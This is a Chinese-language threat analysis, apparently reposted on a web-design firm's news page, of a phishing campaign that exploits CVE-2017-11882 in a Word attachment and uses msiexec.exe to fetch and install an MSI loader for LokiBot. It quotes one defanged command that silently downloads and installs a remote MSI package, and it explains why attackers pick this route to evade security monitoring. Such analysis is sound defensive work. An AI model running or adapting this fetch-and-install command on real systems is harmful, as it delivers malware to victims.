Windows Installer的利用方法是什么，很多新手對(duì)此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來學(xué)習(xí)下，希望你能有所收獲。

創(chuàng)新互聯(lián)建站為企業(yè)級(jí)客戶提高一站式互聯(lián)網(wǎng)+設(shè)計(jì)服務(wù)，主要包括網(wǎng)站設(shè)計(jì)、網(wǎng)站制作、App定制開發(fā)、微信小程序開發(fā)、宣傳片制作、LOGO設(shè)計(jì)等，幫助客戶快速提升營銷能力和企業(yè)形象，創(chuàng)新互聯(lián)各部門都有經(jīng)驗(yàn)豐富的經(jīng)驗(yàn)，可以確保每一個(gè)作品的質(zhì)量和創(chuàng)作周期，同時(shí)每年都有很多新員工加入，為我們帶來大量新的創(chuàng)意。 

近期，我們發(fā)現(xiàn)又有攻擊者開始利用漏洞CVE-2017-11882來實(shí)施攻擊了，但這一次他們使用的是一種非常見的安裝方法：即通過微軟Windows操作系統(tǒng)中的Windows Installer服務(wù)。這跟之前那些使用mshta.exe（用于下載并執(zhí)行Payload）運(yùn)行Powershell腳本并利用漏洞實(shí)施攻擊的惡意軟件不同，我們所發(fā)現(xiàn)的這種攻擊利用的是Windows    Installer服務(wù)中的msiexec.exe。

感染鏈

下圖顯示的是這種攻擊技術(shù)的感染鏈：

我們所分析的樣本似乎來自于一次垃圾郵件活動(dòng)。它首先會(huì)向目標(biāo)用戶發(fā)送一封電子郵件，并讓目標(biāo)用戶確認(rèn)一份支付賬單，然后在郵件中對(duì)用戶進(jìn)行“恐嚇”。郵件內(nèi)容是用韓文寫的，翻譯過來的意思大概是：“你好，你的電腦可能已經(jīng)感染了病毒或惡意軟件，請(qǐng)你檢查一下?！背酥?，郵件中還包含了一個(gè)標(biāo)題為“Payment copy.Doc”的附件（趨勢科技將其標(biāo)記為TROJ_CVE201711882.SM），而這個(gè)文件中就包含了漏洞CVE-2017-11882的漏洞利用代碼。

郵件內(nèi)容如下圖所示：

用戶打開這個(gè)Word文檔之后，便會(huì)看到如下圖所示的內(nèi)容：

成功利用該漏洞之后，攻擊者將會(huì)通過Windows Installer下載并安裝一個(gè)名為zus.msi的惡意MSI包，運(yùn)行命令如下：

Callcmd.exe /c msiexec /q /I “hxxps[:]//www[.]uwaoma[.]info/zus.msi

Msiexec會(huì)下載并安裝一個(gè)名為MSIFD83.tmp的文件：

安裝后的MSIL代碼如下：

下載之后，Windows Installer（msiexec.exe）將會(huì)繼續(xù)在系統(tǒng)中安裝一份MSIL或Delphi代碼，而這份惡意代碼將會(huì)作為實(shí)際Payload的加載器來使用。需要注意的是，惡意數(shù)據(jù)包還采用了一個(gè)壓縮層，所以文件掃描引擎需要不斷進(jìn)行迭代或枚舉才可以檢測到其惡意性。不過想要識(shí)別其真實(shí)Payload還是比較困難的，因?yàn)樗腗SIL或Delphi代碼是經(jīng)過了高度混淆處理的。

運(yùn)行之后，代碼會(huì)啟用一個(gè)隨機(jī)命名的實(shí)例，而這個(gè)實(shí)例替換惡意軟件的Payload。

目前，我們發(fā)現(xiàn)攻擊者主要利用這項(xiàng)技術(shù)來傳播LokiBot（TROJ_LOKI.SMA），不過根據(jù)我們對(duì)其模塊的分析結(jié)果來看，它還可以用來傳播其他的Payload。

下圖顯示的是我們所識(shí)別的LokiBot變種樣本：

為什么攻擊者需要使用新的惡意Payload安裝方法？

安全產(chǎn)品的檢測效率越來越高了，而且它們都會(huì)監(jiān)控類似Wscript、Powershell、mshta.exe、Winword.exe以及其他一些攻擊者可能會(huì)用來安裝惡意Payload的程序。由于這些方法已經(jīng)是網(wǎng)絡(luò)犯罪領(lǐng)域中的熱門方法了，所以它們被發(fā)現(xiàn)的概率也相應(yīng)上升了。不過，使用msiexec.exe來下載惡意MSI數(shù)據(jù)包的情況并不是大多數(shù)惡意軟件會(huì)使用的方法。

雖然Andromeda僵尸網(wǎng)絡(luò)（ANDROM惡意軟件家族）也會(huì)使用msiexec.exe，但使用安裝器的方法還是跟LokiBot不一樣的，因?yàn)锳ndromeda會(huì)將惡意代碼注入到msiexec.exe中來下載Payload。除此之外，Andromeda下載并更新了Payload之后，它會(huì)立即下載并執(zhí)行一個(gè)PE文件。這種方法需要使用的MSI數(shù)據(jù)包，而msiexec.exe會(huì)將其識(shí)別為可安裝的數(shù)據(jù)包，因此它還會(huì)使用到Windows Installer。

實(shí)際上，惡意軟件并不一定要通過MSI數(shù)據(jù)包來安裝自身，跟絕大多數(shù)使用msiexec.exe的惡意軟件不同，我們所分析的樣本并不需要進(jìn)行代碼修改，它使用的就是Windows Installer來安裝惡意軟件。

因此我們認(rèn)為，惡意軟件之所以會(huì)選擇使用這種特殊的安裝方式，主要是因?yàn)閻阂廛浖_發(fā)者設(shè)計(jì)出了新型的安全檢測繞過方法。

緩解方案

由于這種攻擊的開始階段利用的還是釣魚郵件，所以廣大用戶可以通過抵御釣魚郵件的方式來緩解這種攻擊所帶來的影響。除此之外，用戶在閱讀任意郵件時(shí)，一定要仔細(xì)閱讀郵件中文字所使用的措詞，如果發(fā)現(xiàn)了語法錯(cuò)誤或其他問題，就一定要小心了。

看完上述內(nèi)容是否對(duì)您有幫助呢？如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章，請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝您對(duì)創(chuàng)新互聯(lián)的支持。